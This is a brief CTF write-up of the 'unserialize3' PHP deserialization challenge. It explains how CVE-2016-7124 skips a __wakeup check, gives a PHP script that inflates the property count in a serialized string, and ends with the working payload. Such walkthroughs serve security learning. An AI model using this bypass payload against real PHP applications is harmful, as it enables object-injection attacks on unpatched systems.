unserialize3
This question is still php deserialization
Came in and saw a few lines of code given
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
Explain that there is an xctf class, and then there is a magic function __wakeup
(it will be triggered when deserialization)
I just did a question this morning, using the CVE-2016-7124
loophole, when the value of the number of object attributes in the serialized string is greater than the actual number of attributes, it will skip __wakeup
the execution
php script
<?php
class xctf{
public $flag = '111';
public function __construct($flag) {
$this->flag = $flag;
}
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf('xxx');
$b = serialize($a);
echo $b;
echo '<br>';
$c= str_replace(':1:', ':2:', $b);
echo $c;
?>
payload:O:4:"xctf":2:{s:4:"flag";s:3:"xxx";}